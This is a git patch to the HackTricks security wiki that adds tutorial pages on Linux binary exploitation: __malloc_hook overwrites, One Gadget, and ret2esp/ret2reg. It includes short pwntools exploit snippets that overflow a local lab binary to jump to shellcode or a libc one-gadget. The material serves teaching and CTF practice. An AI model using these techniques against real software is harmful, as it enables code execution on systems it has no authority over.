From c539bd7d2c6d13823b53fd25a86762dd0f878e1b Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 31 Mar 2024 10:02:01 +0000 Subject: [PATCH] GITBOOK-4290: change request with no subject merged in GitBook --- SUMMARY.md | 3 + .../linux-exploiting-basic-esp/README.md | 10 --- .../aw2exec-__malloc_hook.md | 45 ++++++++++ .../arbitrary-write-2-exec/aw2exec-got-plt.md | 11 +++ .../linux-exploiting-basic-esp/one-gadget.md | 47 ++++++++++ .../stack-overflow/ret2esp-ret2reg.md | 90 +++++++++++++++++++ .../stack-overflow/ret2lib/README.md | 14 +-- 7 files changed, 200 insertions(+), 20 deletions(-) create mode 100644 reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md create mode 100644 reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md create mode 100644 reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md diff --git a/SUMMARY.md b/SUMMARY.md index 327280410..dbf57fc1b 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -702,6 +702,7 @@ * [EBP2Ret - EBP chaining](reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ebp2ret-ebp-chaining.md) * [Ret2win](reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md) * [Ret2ret](reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md) + * [Ret2esp / Ret2reg](reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md) * [Ret2syscall](reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md) * [Format Strings](reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md) * [Format Strings Template](reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md) @@ -715,7 +716,9 @@ * [Stack Canaries](reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md) * [BF Forked Stack Canaries](reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md) * [Print Stack Canary](reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md) + * [One Gadget](reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md) * [Arbitrary Write 2 Exec](reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md) + * [AW2Exec - \_\_malloc\_hook](reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-\_\_malloc\_hook.md) * [AW2Exec - GOT/PLT](reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md) * [ELF Basic Information](reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md) * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md) diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index 86057343f..de5c03c7d 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -162,16 +162,6 @@ De esta forma se obtendría de forma sensilla la dirección donde está la varia Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen -**Jump to ESP: Windows Style** - -Debido a que el ESP está apuntando al comienzo del stack siempre, esta técnica consiste con sustituir el EIP con la dirección a una llamada a **jmp esp** o **call esp**. De esta forma, se guarda la shellcode después de la sobreescritura del EIP ya que después de ejecutar el **ret** el ESP se encontrará apuntando a la dirección siguiente, justo donde se ha guardado la shellcode. - -En caso de que no se tenga el ASLR activo en Windows o Linux se puede llamar a **jmp esp** o **call esp** almacenadas en algún objeto compartido. En caso de que esté el ASLR, se podría buscar dentro del propio programa vulnerable. - -Además, el hecho de poder colocar la shellcode después de la corrupción del EIP en vez de en medio del stack, permite que las instrucciones push o pop que se ejecuten en medio de la función no lleguen a tocar la shellcode (cosa que podría ocurrir en caso de ponerse en medio del stack de la función). - -De forma muy similar a esto si sabemos que una función devuelve la dirección donde está guardada la shellcode se puede llamar a **call eax** o **jmp eax (ret2eax).** - **Integer overflows** Este tipo de overflows se producen cuando una variable no está preparada para soportar un número tan grande como se le pasa, posiblemente por una confusión entre variables con y sin signo, por ejemplo: diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md new file mode 100644 index 000000000..6f6be527e --- /dev/null +++ b/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md @@ -0,0 +1,45 @@ +# AW2Exec - \_\_malloc\_hook + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+ +## **Malloc Hook** + +As you can [Official GNU site](https://www.gnu.org/software/libc/manual/html\_node/Hooks-for-Malloc.html), the variable **`__malloc_hook`** is a pointer pointing to the **address of a function that will be called** whenever `malloc()` is called **stored in the data section of the libc library**. Therefore, if this address is overwritten with a **One Gadget** for example and `malloc` is called, the **One Gadget will be called**. + +To call malloc it's possible to wait for the program to call it or by **calling `printf("%10000$c")`** which allocates too bytes many making `libc` calling malloc to allocate them in the heap. + +More info about One Gadget in: + +{% content-ref url="../one-gadget.md" %} +[one-gadget.md](../one-gadget.md) +{% endcontent-ref %} + +## References + +* [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook) + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md b/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md index 6d8e96eb9..5b90b9445 100644 --- a/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md @@ -54,6 +54,12 @@ If **`system`** **isn't used** by the script, the system function **won't** have You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`** +## **One Gadget** + +{% content-ref url="../one-gadget.md" %} +[one-gadget.md](../one-gadget.md) +{% endcontent-ref %} + ## **Protections** The **FullRELRO** protection is meant to protect agains this kind of technique by resolving all the addresses of the functions when the binary is started and making the **GOT table read only** after it: @@ -62,6 +68,11 @@ The **FullRELRO** protection is meant to protect agains this kind of technique b [relro.md](../common-binary-protections-and-bypasses/relro.md) {% endcontent-ref %} +## References + +* [https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite) +* [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md b/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md new file mode 100644 index 000000000..75f1f5e95 --- /dev/null +++ b/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md @@ -0,0 +1,47 @@ +# One Gadget + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+ +## Basic Information + +[**One Gadget**](https://github.com/david942j/one\_gadget) allows to obtain a shell instead of using **system** and **"/bin/sh". One Gadget** will find inside the libc library some way to obtain a shell (`execve("/bin/sh")`) using just one **address**.\ +However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided. + +![](<../../.gitbook/assets/image (615).png>) + +```python +ONE_GADGET = libc.address + 0x4526a +rop2 = base + p64(ONE_GADGET) + "\x00"*100 +``` + +To the address indicated by One Gadget you need to **add the base address where `libc`** is loaded. + +{% hint style="success" %} +One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplifies ROP** chains as you only need to call one address (and fulfill the requirements). +{% endhint %} + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md new file mode 100644 index 000000000..f80fedc17 --- /dev/null +++ b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md @@ -0,0 +1,90 @@ +# Ret2esp / Ret2reg + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+ +## **Rest2esp** + +**Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored. + +If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/)). + +Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack. + +### Lacking space + +If you are lacking space to write after overwriting RIP (maybe just a few bytes), write an initial `jmp` shellcode like: + +```armasm +sub rsp, 0x30 +jmp rsp +``` + +And write the shellcode early in the stack. + +### Example + +You can find an example of this technique in [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) with a final exploit like: + +```python +from pwn import * + +elf = context.binary = ELF('./vuln') +p = process() + +jmp_rsp = next(elf.search(asm('jmp rsp'))) + +payload = b'A' * 120 +payload += p64(jmp_rsp) +payload += asm(''' + sub rsp, 10; + jmp rsp; +''') + +pause() +p.sendlineafter('RSP!\n', payload) +p.interactive() +``` + +## Ret2reg + +Similarly, if we know a function returns the address where the shellcode is stored, we can leverage **`call eax`** or **`jmp eax`** instructions (known as **ret2eax** technique), offering another method to execute our shellcode. Just like eax, **any other register** containing an interesting address could be used (**ret2reg**). + +### Example + +You can find an example here: [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg) + +## Protections + +* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it. +* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Those can make harder to find a instruction to jump to esp or any other register. + +## References + +* [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode) +* [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md index 716340e07..b32cea750 100644 --- a/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md +++ b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md @@ -97,17 +97,11 @@ for off in range(0xb7000000, 0xb8000000, 0x1000): * If attacking a remote server, you could try to **burte-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function. -## ONE\_GADGET +## One Gadget -[**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)allows to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**.\ -However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided. - -![](<../../../../.gitbook/assets/image (615).png>) - -```python -ONE_GADGET = libc.address + 0x4526a -rop2 = base + p64(ONE_GADGET) + "\x00"*100 -``` +{% content-ref url="../../one-gadget.md" %} +[one-gadget.md](../../one-gadget.md) +{% endcontent-ref %} ## x86 Ret2lib Code Example